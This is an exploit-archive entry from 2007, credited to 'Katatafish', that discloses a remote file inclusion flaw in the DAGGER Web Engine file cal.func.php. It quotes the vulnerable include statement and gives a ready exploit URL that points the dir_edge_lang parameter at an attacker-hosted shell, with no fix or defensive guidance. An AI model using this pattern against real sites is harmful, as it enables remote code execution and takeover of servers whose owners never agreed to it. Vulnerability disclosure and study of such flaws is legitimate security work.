id: 1968
date: 06/23/2007
title: DAGGER Web Engine <= 23jan2007 Remote File Inclusion Vulnerability
author: Katatafish
cves: 

==================================================================
DAGGER Web Engine <= 23jan2007 Remote File Inclusion Vulnerability
==================================================================



###Dagger-web engine(cal.func.php)Remote File Inclusion###

#download:
http://kent.dl.sourceforge.net/sourceforge/dagger/dagger_r23jan2007.
zip


#code:  (cal.func.php)
include($dir_edge_lang.'cal_lang.inc.php');

#exploit:
http://www.site.com/[path]/cal.func.php?dir_edge_lang=[SHELL]



#  0day.today [2023-03-26]  #